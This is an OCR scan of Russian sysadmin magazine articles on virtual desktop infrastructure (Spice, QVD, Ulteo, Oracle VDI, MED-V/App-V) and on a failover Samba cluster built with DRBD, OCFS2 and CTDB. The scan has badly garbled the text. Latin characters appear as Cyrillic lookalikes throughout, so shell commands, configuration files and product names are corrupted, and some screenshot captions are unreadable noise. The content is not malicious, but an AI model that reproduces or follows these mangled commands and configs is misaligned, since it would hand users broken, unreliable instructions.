постаралась, чтобы интегрировать поддержку протокола во все воз- 
можные средства управления виртуальными машинами. Сегодня 5рісе 
встроен в ОЕМІІ, библиотеку ІіЬѵИ и инструменты управления вирту- 
альными машинами типа ѵИ-тападег и ѵігзЬ. Псевдодрайвер 5рісе, 
позволяющий выжать из протокола все, уже доступен для Х-сервера, 
а в качестве клиентов доступны простой зрісес, работающий поверх X 
ѴѴіпбоѵѵ, специальный плагин для Рігеіюх, а также несколько графиче- 
ских клиентов на основе библиотек СТК и ОС 

Фактически, все что нужно сделать для запуска простейшей 
5рісе-сети — это выполнить две простые команды: 

1. Насторонесервера: 
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-Ма /путь/до/образа/диска стартуем его самостоятельно: 



2. На стороне клиента: 

$ зисіо ар1:-§е1: іпзііаіі зрісе-сііепі: 

$ зрісес -б ІосаІЬозі -р 1234 

Для тестирования этого вполне достаточно, но для развертыва- 
ния сети с десятком-другим клиентов, работающих с разными 
ОС, гораздо удобнее воспользоваться графическим менеджером 
виртуальных машин ѵИ-тападег. Я не призываю устанавливать на 
сервер иксы, потому как ѵИ-тападег может работать и удаленно, 
посылая команды демону ІіЬѵИсІ по ззЬ. Итак, ставим на сервер 
дети, ІіЬѵИ и демон ІіЬѵИсІ: 

$ зисіо ар~Е-§е1: іпзііаіі Ьгісі^е-иііііз сіпзтазд \ 
кѵт дет и ІіЬѵігІ: ИЬѵігІі-Ьіп 



$ зисіо /еіс/іпгЕ.(і/1іЬѵігЕсІ 5І:аг1і 

Теперь идем на машину с иксами, ставим ѵИ-тападег и подключа- 
емся к ІіЬѵИсІ: 

$ зисіо арі-^еі: іпзііаіі ѵігЕ-тапа^ег 
$ ѵігЕ-тапа^ег -с дети+ззЬ : //гооіфзегѵег . сот/зѵзііет 

Нажав на кнопку «Новая», создаем новую виртуальную ма- 
шину с нужными опциями, производим установку ОС, тестируем. 
Если имеем дело с И N IX, обязательно устанавливаем видеодрай- 
вер для 5рісе-сервера хогд-ѵібео-дхі, без него большая часть 
оптимизаций не будет работать. Далее выключаем виртуальную 
машину, выбираем пункт меню «Вид -> Подробности», нажимаем 
«Добавить оборудование», выбираем пункт «ОгарЫсз», в поле 
«Тип» указываем « 3 р і с е зегѵег», указываем нужный номер порта 



ТЕХНОЛОГИИ МЕй-Ѵ И АРР-Ѵ 



Нередко в организациях можно встретить приложения, работающие 
только под ѴѴіпХР — перенос их под нов ыеѴѴіп7 ил и ѴІ5Іа невозможен или 
нецелесообразен. Даун грей д ОС также неприемлем, самая банальная 
причина — нет драйверов под новый ноутбук. Держать отдельный 
комплишьдля одной древней проги тоже не выход. Технология МЕй- 
V (Місгозоіі Епіегргізе Оеэкіор Ѵігіиаіііаііоп, сІск.ги/ѴѴОдТ ) является 
неким аналогом реализации ѴйІ, но на клиентской стороне. Одной из 
основных ее частей является всем известный ХР Мосіе, позволяющий 
за пускать виртуальную ОС (ѴѴіпХР/ѴІ5Іа) в специальной редакци и ѴИиаІ 
РС. При этом пользователь даже не заметит «подмены», — вместо окна 
виртуальной машины он будет работать с «обычным» приложением, 
запускаемым через меню «Пуск». 

ТехнологияАрр-Ѵ(МісгозоКАррІіса 1 іопѴИиаІІ 2 а 1 іоп)даетвозможность 
преобразовать обычные приложения в виртуальные, причем 
пользователю не нужно их перед этим устанавливать и настраивать. 



Внеш нетакое приложение работаеткакобычное (его в ид но в менеджере 
задач), но выполняется в особой виртуальной среде. По сути, Арр-Ѵ — это 
удобное средство доставки приложений, работающих в родной среде 
(в отличиеотМЕО-Ѵ),нетребующеевыделенияподнихотдельногоПКили 
подключения к терминальному сервису. Назначением приложений можно 
управлять при помощи групповыхполитик,также просто и у б рать доступ, 
не удаляя его физически. 

Данные технологии не доступны для ѴѴіп7 Ноте/51аг1ег 
и не входят в стандартную поставку. Чтобы воспользоваться 
возможностями МЕй-Ѵ, необходимо установить МйОР Шезкіор Ор- 
Іітігаііоп Раск, пакет содержит еще ряд полезных решений). Если 
систем, требующих МЕй-Ѵ, очень много, понадобится развертывание 
специального сервера управления, хотя МЕй-Ѵ 2.0 и Арр-Ѵ 
интегрируются с Зузіет Сепіег Сопіідигаііоп Мападег. 



ХАКЕР 04/159/2012 



119 




5УЫ/АСК 



5РІСЕ ПОЗВОЛЯЕТ ПРОБРАСЫВАТЬ 
ПО СЕТИ НЕ ТОЛЬКО ИЗОБРА- 
ЖЕНИЕ РАБОЧЕГО СТОЛА, НО И 
УСТРОЙСТВА ВВОДА, ЦБв-ПОРТЫ, 
АУДИОПОТОК 

и пароль. Если был установлен драйвер цхі, переходим в раздел 
«Видео» и в поле «Модель» выбираем цхі. Все, виртуальная маши- 
на готова кудаленному подключению по протоколу 5рісе. Теперь 
нужно настроить тонкие клиенты так, чтобы они автоматически 
цеплялись к 5рісе-серверу после загрузки. Для этого устанавли- 
ваем на клиенты любой І_іпих дистрибутив, содержащий Х-сервер 
из коробки. После установки создаем беспарольного пользователя 
с любым именем и прописываем ему в автозагрузку следующую 
команду: 

врісес --Р -б адрес_сервера -р номер_порта -м пароль 

Ее можно поместить либо в файл -/.хзевзіоп пользователя, 
сразу после слова «ехес», либо в скрипт внутри каталога ~/.сопПд/ 
аиіозіагі, чтобы его подхватывала среда рабочего стола. В любом 
случае после логина пользователя будет стартовать 5рісе-клиент 
на полный экран и устанавливать соединение с виртуальной 
машиной. Чтобы пользователю не приходилось два раза входить 
(сначала в реальную машину, затем — в виртуальную), лучше на- 
строить автологин. 

Для каждого терминала можно создать собственную виртуаль- 
ную машину, указывая разные порты и пароли 5рісе в настройках. 

Сделать это с помощью ѵИ-тападег очень просто. Достаточно 
создать нужное число клонов виртуальной машины («правый клик 



мыши на виртуальной машине -> СІопе») и немного изменить на- 
стройки каждой из них. Само собой разумеется, что при количестве 
клиентов, превышающем 10-15, одним сервером не обойтись, 
поэтому в ѵИ-тападег есть возможность управления виртуаль- 
ными машинами на нескольких серверах («Файл -> Добавить 
соединение»). 



ОѴй 



Проект ОѴй (Оиаіііу Ѵігіиаі йезкіор, ШедѵсІ.сот ) представляет 
собой масштабируемое, эффективное и простое в управлении ѴйІ 
с открытым исходным кодом, построенное на базе бЫІІ/ипііх и по- 
зволяющее запускать ѴМ с одного или нескольких образов ОС на 
одном узле. Основным направлением развития проекта является 
обеспечение доступа к ѴйІ как можно большего числа пользовате- 
лей и минимизация потребления ресурсов для каждой сессии. Ша- 
блонный образ ОС может быть использован несколькими ѴйІ, что 
позволяет стандартизировать рабочую среду и упростить управ- 
ление. Состояние Ѵй записывается в отдельный образ (оѵегіаув), 
который по окончании работы может уничтожаться (по умолчанию) 
или сохраняться. Во втором варианте при следующем подключе- 
нии клиент сразу продолжит работу с того же места. В настоящее 
время проект предлагает клиенты для ѴѴіпсІоѵѵз и І_іпих, на подходе 
версия для АпбгоісІ. 

В настоящее время ОѴй считается надежной и безопасной сре- 
дой и используется во многих организациях, в том числе благодаря 
быстрой окупаемости вложений (Реіигп оп Іпѵезітепі, РОІ). Напри- 
мер, его выбрал крупнейший банк Мексики ВВѴА Вапсотег. 
Основой ОѴй является технология КѴМ (КегпеІ ѴИиаІ МасЫпе), 
клиент для доступа использует протокол ЫХ, обеспечивающий 
защищенное и стабильное соединение при низкоскоростных под- 
ключениях. Авторизация пользователя возможна средствами ЮАР. 

Функционально система состоит из трех компонентов: одного 
или нескольких ОѴО-серверов, сервера управления и сервера 
Ро5Ідге5С!І_. Чтобы обеспечить максимальную производитель- 
ность и масштабируемость, они должны располагаться на разных 
машинах. Разработчиками сообщается, что ОѴй был развернут на 
предприятии для обслуживания более 35 000 пользователей и обра- 
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Новая эра терминальных систем 



1Л.ТЕ0 ОРЕЫ ѴІКТУАІ. 0Е5КТ0Р (ОѴй) 



Платформа ОѴй (ийео.сот) от Гаэля Дюваля, создателя 
Мапсігаке/Мапсігіѵа І_іпих, позволяет организовать доступ 
при помощи веб-браузера или специального клиента 
к рабочим столам или отдельным приложениям на базе 
І_іпих или ѴѴіпсІоѵѵ5. При этом пользователь подключается 
к своему рабочему месту с любого ПК, на котором установлен 
браузер с Заѵа плагином. Решение совместимо с некоторыми 
облачными системами вроде Атаюп ЕС2. Структурно ОѴй 
состоит из нескольких компонентов: менеджера сессий, 
сервера приложений, файлового сервера и шлюза. Первые 
два являются основными. Аутентификация пользователя 
возможна средствами ЮАР/Ай и САБ. 

В настоящее время доступен РС8 новой ветки 3.0. Для 
организации подключения кудаленным рабочим столам 
используется защищенный протокол НТТР5/443, обмен 



данными идет по РОР (ТСР/3389). В текущей редакции 
пользователь может без проблем воспроизводить аудио- 
и видеофайлы из домашних каталогов, размещенных на 
удаленных системах. Поддерживается более двадцати 
языков, в том числе и русский. Серверная часть платформы 
поддерживаетустановку (через специальный репозиторий) 
на ІІЬипІи 10.04 І_Т5, РНЕІ_ 5.5 (неофициально СепЮБ и Ре- 
сіога), МоѵеІІ 5І_Е5 11 5Р1, ѴѴіп2кЗ/2к8/Р2 (только сервер 
приложений). Доступен и установочный ОѴО, построенный на 
базе ІІЬипІи. 

Сегодня ІІКео активно развивается и зарекомендовал 
себя стабильным продуктом, используется в госсекторе 
и образовании, небольших и средних предприятиях, а также 
некоторыми хостинговыми компаниями, предоставляющими 
услуги удаленного доступа. 



ОКАСІ-Е ѴйІ 



Технология, являющаяся частью Огасіе ѴИиаІііайоп — набора 
средств виртуализации, который призван покрывать все 
потребности организаций оттерминалов (вроде Бип Рау) до ЦОД 
(Бип Ріге, Бип Біогаде). Огасіе ѴйІ представляет собой менеджер 
сессий — соппесйоп Ьгокег — обеспечивающий подключение 
клиентов к виртуальным рабочим местам по протоколам 
РйР или 56й (Огасіе Бесите ОІоЬаІ йезкіор). В качестве 
виртуальных машин (ѴИиаІііайоп І_ауег) могут выступать 
ѴИиаІВох, ѴМѵѵаге ѵБрИеге, Нурег-Ѵ, а также отдельные ПК, 
предоставляющие доступ по ВОР. Приложения могут работать 
под управлением любой популярной ОС (ѴѴіпсіоѵѵз, Боіагіз, 

Ыпих, *піх и др). В случае выбора 560 пользователь запускает 
в браузере специальный веб-клиент, обеспечивающий доступ 
к данным с любого устройства (браузер, поддерживающий 
Заѵа[ВВ1]), шифрование сеанса и дополнительный уровень 



защиты (на локальной машине не сохраняется никакая 
лишняя информация — соокіе, кэш, авторизация и так далее). 

К слову, менеджер администрирования ѴОІ также написан 
на Заѵа и представляет собой веб-приложение. Режим «кіозк 
тосіе» позволяет работать с приложением в полноэкранном 
режиме без возможности доступа к самой ОС. Технология 
Аггау Везіііепсе в случае недоступности основного сервера 
автоматически переключает соединение на следующий 
сервер в массиве. Пользователи могут иметь персональные 
десктопы или работать с пулом, подключать сменные носители, 
воспроизводить качественное видео и аудио, получить 
32-битный цвет и так далее. Индивидуальные параметры 
подключений можно хранить в атрибутах Ай/ЮАР. В качестве 
базовой платформы используется Боіагіз или Огасіе Епіегргізе 
Ыпих (клон РНЕІ_). 



гтш 

• О настройке 
сервера терминалов 
в ѴѴіп2к8 читай в ][ 
09.08; 

• подробнее о Нурег- 
V читай в статье 
«Гиперактивная 
виртуальность», ][ 
02.09; 

• в ][ ІІ.Юты 
найдешь обзор 
ѴМѵѵаге Ѵіеѵѵ 4.5; 

• в ѴѴіп2к8Р2 КйБ 
умеет назначать 
динамический/ 
виртуальный 
1Р-адрес каждому 
сеансу или 
приложению, что 
решает проблему 
привязки к 1Р; 
•технологии ТБ/РйБ 
и ѴйІ не 

взаимоисключают, 
а дополняют друг 
друга; 

• в настоящее время 
ОѴй используется 

в крупнейшем банке 
Мексики ВВѴА 
Вапсотег. 

шш 

• Набор руководств 
отМісговоЙ по 
развертыванию РОБ 
и ѴОІ: Іск.ги/ѴѴсІсІР: 

•сайтОѴО: 

Щедѵсі.сот . 



ѴѴАРЫШС 



Для ВОЗМОЖНОСТИ 
удаленного 
подключения 
к сессии клиентов 
необходимо в ветке 
реестра НКЕѴ_І_ОСАІ__ 
МАСНІМЕ\5Ѵ5ТЕМ\Сиг- 
гепШ)п1:го15е1:\Соп- 
1:го1\Тегтіпа15егѵег 
установить значение 
параметра АПоиКе- 
пкйеКРС в «1». 



ботки до 9 000 одновременных сессий, причем успешно справлялся 
с работой. Сервер управления обеспечивает подключение клиентов, 
запуск нужной ѴМ и получение виртуального ІР. Состоит из трех 
компонентов: брокера соединений І_7Р, демона НКй (Ноизе Кееріпд 
йаетоп), отвечающего за пуск/останов ѴМ и связь с БД, и І\Ые 
— элемента управления І_7Р и НКБ. Для хранения данных исполь- 
зуется любой ІМА5/5АІМ ресурс. Управление и мониторинг работы 
производятся при помощи веб-интерфейса ОѴБ ѴѴеЬ Асітіпізігаііоп 
ТооІ (ѴѴАТ, написан на РегІ Саіаіузі) или из консоли (цѵсі-асітіп). 

Доступно несколько версий ОѴБ - свободный Соттипііу, плат- 
ный СоттегсіаІ и сервис СІоисІ (на хостинге 0ѴБ). Сравнение их 
функциональности можно найти на сайте. 

Проект предоставляет репозиторий пакетов для ІІЬипІи 10.04 
И5 и 5І_Е5, а также демообразы для виртуальных машин (на базе 
ІІЬипІи 10.10). Но разработчики отмечают, что установить ОѴй при 
помощи исходных текстов можно на любом Ыпих. В ІІЬипІи 10.04 
І_Т5 процесс выглядит довольно просто, вначале следует добавить 
информацию о новом репозитории: 

$ висіо ар1=-асІсІ-гер о5 І1=огѵ \ 

' сІеЬ Иіііір : //ІіЬедѵсІ . сот/сІеЫап ІисісІ таіп' 

$ зисіо аріі-^еі: ирс!а1:е 



После обновления в списке появится несколько пакетов цѵсі-*. Для 
упрощения изучения разработчики предлагают специальный мета- 
пакет, устанавливающий все компоненты на один сервер: 

$ зисіо ар1:-§е1: іпзііаіі \ 

цѵсІ-сІето-5Іп§1е-іп5І:апсе-по5иррог1: цѵсі-асітіп 

Теперь можно подключаться к ѴѴАТ, который по умолчанию рабо- 
тает на 3000 порту, и приступать к настройкам. Чтобы упростить 
установку, из поставки убраны все образы ОС, поэтому их при- 
дется «готовить» самостоятельно (за плату разработчики пред- 
лагают несколько вариантов, в том числе и индивидуальные). Все 
образы хранятся в четырех подкаталогах /ѵаг/МЬ/цѵсІ/зІогаде (его 
обычно монтируют через ІЧР5): Ьогтіез (цсоѵѵ2 изображения поль- 
зовательского /Йоте), ітадез (ОС), оѵегіауз (временные файлы) 
и зіадіпд. 



ЗАКЛЮЧЕНИЕ 



Какты могубедиться, идея терминалов и единого вычислительного 
центра продолжает жить и процветать, заставляя программистов 
и админов выдумывать все более изощренные методы связи, удо- 
влетворяющие потребностям сегодняшнего дня. ПЕ 
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5УЫ/АСК 



Евгений Зобнин (гоЬпіпйдтаіІ.сот) 




НЕИЗМЕННО ВЫСОКАЯ 

ДОСТУПНОСТЬ 



РАЗВОРАЧИВАЕМ 
ОТКАЗОУСТОЙЧИВЫЙ 
СЕРВИС ХРАНЕНИЯ 
ДАННЫХ НА БАЗЕ 
5АМВА 



Каждая организация в той или иной мере 
нуждается в быстром и надежном сервисе 
хранения данных. В большинстве случаев эта 
задача решается с помощью покупки разного 
рода оборудования, реализующего ЫА5, однако 
создать высокопроизводительный и устойчивый 
к сбоям файловый сервис можно и на базе 
парочки стареньких серверов, оснащенных 
достаточно емкими дисками. 
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се<іЬ 



* А.'ЧЦІІЯІ 
Л ІІ^ІІЦЦ 

* «іЬ 

* |-і| 1 1 н. Лі 1 1 1 - 




\\скопіс ІО іііс СТОП исЬ рй§сз 



СТОП із-і еііпіет мг^ііпплііпітт ШВ іЬЫчк онО Ьу "млпЬа ппіі-' -іНп 
ртартЛч Іи ч4інт 1пп[ч*гаг} іЬіа И вп нррЬгаГит п -яігг-а іінщ І1Ш Ьг Іипргпугу 
йаш И ІР іхіу СМу № СИИЧГТ №11 йррІ№НІ« № Ы ОМА й«г*к й№І II рС СШЫ 

Іднсмі 



і~ ЕіЖ угтг- і»ірт ЧЪг ч-ьтцр 1^-ргч- !>І Ічііч-іііта. « 1 - I 14! ЫчІ ія * сЬіМгтІ ІяіЬнчі, 

рттгѵіфлв Н I I ІК-^ІуІг ІІЯІИІЦГЫГ ІІМІ чиять ІІЦДІІірк ЦтёртСИІ (*і*Ь Ш И 4ГІ№МкТ 

ГйквашШуЛй! 

* СТНЗ ртідсі» іЬігІші«тііМ*ш4йі інІ«п»Ыв(І Інкіі^вищі 
■II цмкі іа ■ сітіет. 

* СПИ! ЬѴауГйИ. 

* Ій Ш оГгк>Іс Ііііиг^. СТОЙ *і1! ЫШНШкйІІу НОТН Ы Крйѵ йіі ТОЙ 
іЬідкис. іЬіі |і лицндо 




Странички, посвященные проекту СЮВ 



ВВЕДЕНИЕ 



В этой статье мы рассмотрим процесс создания высоконадежно- 
го файлового хранилища, реализованного на безе двух типичных 
серверов, операционной системы (ЗІМІІ/ипих и сервера БатЬа. 
Мы создадим небольшой, но устойчивый к сбоям кластер: вы- 
ход одного из узлов из строя никак не повлияет на доступность 
данных. 



ТЕОРИЯ 



В обычной ситуации файловый сервис на основе БатЬа выглядит 
как машина, оснащенная достаточно емким жестким диском, на 
которую установлен дистрибутив І_іпих и пакет программ БатЬа, 
отвечающих за обслуживание клиентских запросов на доступ к 
ресурсам. Изъян такой конфигурации в том, что выход из строя 
жесткого диска моментально обрушит весь сервис и оставит кли- 
ентов без хранилища данных. 

Понятно, что для решения этой проблемы следует в обяза- 
тельном порядке применять РАЮІ-массив, который позволит 
сохранить данные и работоспособность сервиса, даже если один из 
дисков умрет. Это типичная конфигурация, которая, тем не менее, 
не спасет от смерти самого сервера или одной из его железяк. В 
этом случае данные все равно окажутся недоступны. 

Чтобы избежать и этой ситуации, можно собрать мини-кластер 
из нескольких машин, данные с жестких дисков которых будут 
зеркалироваться по сети с помощью драйвера ОРЕЮ и специаль- 
ной параллельной файловой системы. Но и здесь есть загвоздка: 
если мы просто установим на оба этих узла БатЬа, то легко по- 
лучим несогласованность файловой системы, видимой удаленным 
пользователям. 

Для отображения семантики файловой системы Ш\ІІХ в СІРБ 
и поддержки своего состояния БатЬа использует легковесные 
базы данных, называемые ТОВ, которые содержат такие данные 
как таблица соответствия ѴѴіпсІоѵѵз 5Ю и ІІпіх ІІЮ/6Ю, данные 
об открытых сессиях, таблицу блокировок и так далее. Если два 
экземпляра БатЬа будут работать с одним общим хранилищем, но 
иметь разные таблицы ТОВ, это приведет к весьма печальным по- 
следствиям с первыхже минут запуска сервиса. 

Но и этой проблемы можно избежать, воспользовавшись демо- 
ном СЮВ (Сіизіег ТОВ), который будет хранить единую базу данных 
для нескольких экземпляров БатЬа и следить за ее соответствием 
реальному положению дел. В качестве бонуса СЮВ также будет 
выполнять функции мониторинга и автоматического отключения 
нерабочих узлов от кластера, что избавит нас от необходимости ис- 
пользования сторонних инструментов. 



Итого для настройки высоконадежного файлового сервиса 
БатЬа нам необходимо следующее. 

1. Обзавестисьдвумя серверами, в каждом из которыхустановлено 
два диска и двесетевые карты. 

2 . Настроитьсетевой РАЮ1 междуними. 

3. Поднять параллельную ФС на РАЮ1 -массиве. 

4 . Установить и настроить на каждом узле БатЬа. 

5 . Поднять СЮВ для расшаривания данных о состоянии между 
демонами БатЬа. 

Такой вот многослойный пирог, приготовлением которого мы и 
займемся прямо сейчас. 



НАСТРОЙКА ХРАНИЛИЩА 



Итак, у нас есть два сервера, каждый из которых оснащен двумя 
жесткими дисками. На /сіеѵ/зсіа стоит операционная система 
(я буду использовать йеЫап), /сІеѵ/зсіЬ отведен для хранения 
данных БатЬа. Можно использовать и один диск, но такая 
конфигурация будет менее производительной и удобной в сопро- 
вождении. 

Наша первоочередная задача — объединить жесткие диски 
двух машин в массив РАЮ1. Сделать это по сети можно с помо- 
щью драйвера йРВО и кроссовер-кабеля, соединяющего серверы 
напрямую через одну из двух сетевых карт. Это позволит создать 
мост для быстрого обмена данными между машинами, в то время 
как клиенты будут получать доступ к кластеру с помощью другого, 
внешнего сетевого интерфейса. 

Чтобы не путаться, сразу определимся, что 10.0.0.1 и 10.0.0.2 
— это внутренние ІР-адреса, объединяющие серверы с помо- 
щью кроссовер-кабеля, а 192.168.0.1 и 192.168.0.2 — это внешние 
адреса, по которым будет происходить обмен сервисными данными 
и которые будут видны клиентам (на самом деле все несколько 
сложнее, но об этом позже). 

После настройки ІР-адресов выполняем на каждой машине 
следующую команду: 

# арі-деі: іпзііаіі с!гЬсІ8-и1:іІ5 

Далее на одной из машин создаем файл /еІс/сІгЬсІ.сопі и пишем 
в него следующее: 

# ѵі /еѣс/сІгЬсІ.соп-Р 

§1оЬа1 { иза§е-соип1: по; } 
соттоп { зупсег { гаііе 1ѲѲМ; } } 
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Как работает РРВР 



гевоигсе г0 { 
ргоііосо і С; 
віагіир { 

іл/Тс-іітеоиІ: 15; 
сІе^г-іл/Тс-ІіітеоиІ: 60; 

пеі { 

# Настройки двухголовой конфигурации (ргітагѵ/ргітапЛ 

а Пом - імо - р г і т а г іев ; 
а-РЕег-вЬ-Ѳргі сІівсагсІ- 2 его-сІіап%ев ; 
аТіег-вЬ-Іргі сопвепвив; 
аТ1:ег-вЬ-2ргі сіівсоппесі:; 

# Пароль и метод шифрования 

вбагесі -весте! "ПАРОЛЬ"; 
сгаггьІітас-а1§ вііаі; 

} 

# Первый узел 

оп посіеі { 

сіеѵісе /сІеѵ/сІпЬсІѲ; 
сіівк /сІеѵ/всІЬ; 
асісігевв 10.0.0.1:7788; 
теіі а-сі івк іпііегпаі; 

} 

# Второй узел 

оп посІе2 { 



СОБИРАЕМ МИНИ-КЛАСТЕР ИЗ 
НЕСКОЛЬКИХ МАШИН, ДАННЫЕ С 
ЖЕСТКИХ ДИСКОВ КОТОРЫХ БУДУТ 
ЗЕРКАЛИРОВАТЬСЯ ПО СЕТИ 



сіеѵісе /сІеѵ/сІгЬсІ0; 
сіів к /сІеѵ/всІЬ; 
асісігевв 10.0.0.2:7788; 
теіа-сіі вк іпііегпаі: 

} 

} 

Главное здесь — это пароль, используемый для доступа к 
массиву, а также два последних блока, описывающих диски 
массива. Они могут иметь произвольные имена, однако поля 
должны содержать актуальные данные для каждого из хостов. 
Опция «сПвк» задает блочное устройство, которое станет частью 
массива, опция «асісігевв» — внутренний ІР-адрес узла и порт 
йРОВ. Файл необходимо скопировать на второй узел в неизмен- 
ном виде. 

Теперь инициализируем массив, выполнив на обоихузлах 
команду: 

# сІгЬсІасІт сгеаіе-тсі г0 



Далее стартуем сервис сігЬсі (опять же на обоих узлах): 

# /еіс/іпіІі.сІ/сІгЬсІ віагЕ 

На одном из узлов выполняем следующую команду, которая 
сделает оба узла главными, то есть позволит монтировать 0РВ0- 
девайс с обеих нод: 

# сІгЬсІвеІіир /сІеѵ/сІгЬсІѲ ргітагу -о 

После этого должна начаться синхронизация, за ходом которой 
можно следить, читая файл /ргос/сІгЬсІ: 

# саі /ргос/сІгЬсІ 

После окончания синхронизации на массиве можно создать 
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файловую систему. Стандартная ФС не подойдет, так как не сможет 
обеспечить соответствие метаданных при одновременном доступе 
к ФС с разных узлов. Поэтому нам нужна параллельная файловая 
система (также называемая кластерной), на роль которой отлично 
подойдет 0СР52 от Огасіе (хотя можно использовать и любую дру- 
гую, например СР52). 

Код 0СР52 есть в ядре, поэтому все, что требуется установить, 
это утилиты управления: 

# арі-^еі: іпзііаіі ос-р52-іооІ5 

Конфиг файловой системы хранится в Мс/осі^/сІизІег.сопГ 
В нашей конфигурации он должен иметь примерно следующий 
вид: 

# ѵі /е-Ьс/ос-р52/с1и5Іег.соітР 
сіизііег : 

посіе соипі: = 2 
пате = ооРз2 



посіе: 

іррогЕ « 7777 
ірасісігезз = 192.168.0.1 
питЬег = 1 

пате =_ посіеі . сіизіег . Іосаі 
сіизіег = ос-Рз2 



посіе: 

ІррогЁ = 7777 
Ір_ас1с1ге55 = 192.168.0.2 
питЬег = 2 

пате = посІе2 . сіизіег . Іосаі 
сіизііег = ос-Рз2 



Этот конфиг описывает кластер с именем осі : 52 и двумя нодами: 
посіеі. сіизіег.іосаі и побе2.сІи5Іег.ІосаІ. Имена нод должны совпадать 
с именами хостов, поэтому необходимо заранее позаботиться о при- 
вязке имен хостов к ІР-адресам в файле /еІс/ЬозІз обоих узлов. Имя 
кластера менять не стоит, так как загрузочные скрипты по умолчанию 
будут инициализировать кластер «0^52» и не смогут завершить этот 
процесс, если имя будет другим. Обрати внимание, что в этот раз мы 
используем внешние ІР-адреса. 

Копируем конфиг на оба узла и запускаем службу о2сЬ: 

# /е1=с /Іпіі: . сІ/о2сЬ 5І=аг1= 

Теперь можно создать файловую систему на йРВО-устройстве. 
Сделать это можно с любого узла: 

# тк-Рз .осТз2 -І_ "ос-р52" /сіеѵ/сі пЬсІѲ 



Далее ФС можно смонтировать (здесь и далее я буду использо- 
вать каталог/затЬа в качестве точки монтирования и корня для 
5атЬа): 

# тксІіг^затЬа 

# есбо "/сіеѵ/сі г ЬсІѲ /затЬа осТб2 поаііте 0 0" >> /е1:с/Т5І:аЬ 

# тоипТ /сІеѵ/сІгЬсІ0 

Сделать это необходимо на обоих узлах. Чтобы избежать воз- 
можных проблем в будущем, проверь работоспособность кластера 
и корректность настроек с помощью копирования файлов и ката- 
логов в файловую систему. При правильной настройке содержимое 
ФС должно выглядеть идентично на обоих узлах. 



ЗАПУСК 5АМВА 



Если в работе файловой системы не возникает проблем, то можно 
переходить к установке и настройке 5атЬа. Главное здесь, как я 
уже говорил, демон СЮВ, поэтому мы остановимся на очень про- 
стом конфиге 5атЬа, а ее кластерную составляющую рассмотрим 
более подробно. 

Итак, наш конфиг 5атЬа будет выглядеть примерно так: 

[§1оЬа1] 

с1из1:егіп§ = уез 
ісітар ЬаскепсІ = ТсІЬ2 
ргіѵаіе сІіг=/затЬа/с1:сІЬ 
61еіД:тарщп§ = -Рзігі 
ѵ-Рз оЬз'есІіз = бі еісі 



[риЬІіс] 

соттепТ = риЫіс зііаге 
раѣіі = /затЬа/риЬІіс 
риЬ І іс = уез 
шгіІі еаЫе = уез 
опіу §иез1і ^ уез 

Это простейший пример файла Мс/затЬа/зтЬ.сопІ 1 с одной пу- 
бличной «шарой», а также приватным каталогом /затЬа/сЫЬ для хра- 
нения данных демона СЮВ. Фактически, только первыетри строки 
необходимы для работы самбы в кластерном варианте, остальное — 
просто оптимизация для работы с 0СР52 и описание сетевого диска. 
Каталоги, естественно, необходимо создать заранее: 

# тксііг /затЬа/сІісІЬ 

# тксііг /затЬа/риЬІіс 

# сбтосі 777 /затЬа/риЬ Ііс 

Инициализируем базу паролей: 

# зтЬраззмсІ -а гооі 




Производительность 

Р№МТ ЖН 

ПМНСН СІГІ 

ДЯГЙНЙНѴ 
«АКІІрАгі» 

МЕ'ІЫріл уІДМ 

іВД&ѵйт 
іьм нааітн 
мЬпшігі 

РСПЩ іѵіішши 
НІКМІІ ВРР? 




> СІгіЬ 5ІЛІІІ5 

МитЬег о і посіег : 2 

рпп :0 132.168.0, 1 ОК СТН15 N0061 

рпп : 1 192.168.8.2 ПК 

бепегаі іоп : 1ЭБ2Б79229 
5іге :2 

ііа$іі:0 ітазіепѲ 
НѳзН:1 Ітазіег;! 

Иесоѵегу тосіе : ИОРГІЯЬ (8) 

Ресоѵегу ілазІегіѲ 



Производительность СЮВ-кластера растет пропорционально количеству узлов 



Проверяем состояние кластера 
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Далее устанавливаем самбу на оба узла и копируем на них 
вышеприведенный конфиг. В качестве окончательного штриха 
устанавливаем и настраиваем СЮВ на обоих узлах: 

# аріі-^еі: іпзііаіі с1:сІЬ 

Сам демон не имеет конфигурационного файла, но, тем не 
менее, требует настройки с помощью скриптов инициализации 
и закрепленных за ними конфигов. В Ребога/РесІНаІ это /еіс/ 
зузсопЛд/сІсІЬ, в ОеЬіап/ІІЬипІіі — /еІс/сЫаиІі/сІсІЬ. Файл необходи- 
мо отредактировать на обоих узлах: 

# Местонахождение Іоск-файла мастера восстановления 
СТРВ^ЕСОУЕКУЮССК^зм^а/с^Ь/Хоск" 

# Публичный сетевой интерфейс, используемый для 

# обмана данными 

СТРВ РЦВИС ІМТЕКРАСЕ=е1=Іі0 

# Список адресов, по которым будет доступен кластер 
СТРВ_РЦВІІС_АРРКЕ$$Е$=/е1=с/с1:сІЬ/риЫіс_асІсІпе55е5 

# Перекладываем работу по запуску БатЬа на СТРВ 

СТРВ МАІМА6Е5 5АМВА=уез 

# Список СТРВ -узлов 

СТРВ_М0РЕ5=/е1=с/с1=сІЬ/посІе5 

# Куда писать логи 

СТРВ Ю6Р ИЕ=/ѵаг/1ое/1ое . сЫЬ 

Далее создаем файл /еіс/сісі Ь/посІез и добавляем в него ІР- 
адреса узлов 5атЬа, то есть наши два сервера: 

192.168.0. 1/24 

192.168.0. 2/24 

Также создаем файл Мс/с{бЬ/риЫіс_асІсІге55е5 с еще двумя 
ІР-адресами: 

192.168.0. 3/24 

192.168.0. 4/24 

Эти адреса должны отличаться от публичных адресов, но на- 
ходиться в той же подсети. Они будут автоматически назначены 
узлам кластера в качестве дополнительных ІР-адресов, по кото- 
рым и будет происходить подключение клиентов. Это нужно для 
автоматического поддержания работоспособности кластера. Если 
один из узлов выйдет из строя, СЮВ автоматически присвоит его 
ІР-адрес другому узлу, и клиенты будут работать, как ни в чем не 
бывало. 

Этих настроек должно быть достаточно. Запускаем СЮВ на 
обоих узлах: 

# /е~Ес/іпгЕ.сІ/сЕсІЬ зХагЧ: 

Если он работает нормально, то команда «сІбЬ зіаіиз» вернет 
что-то вроде этого: 

ІМитЬег о-Р пос!е5:2 

рпп : 0 192.168.0.1 ОК (ТНІ5 ІЧСЮЕ) 



ЧТОБЫ ВОВРЕМЯ РЕАГИРОВАТЬ 
НА ПАДЕНИЕ УЗЛОВ, СЛЕДУЕТ 
ПРИМЕНЯТЬ РАЗЛИЧНЫЕ 
МЕТОДЫ МОНИТОРИНГА 



рпп : 1 192.168.0.2 ОК 

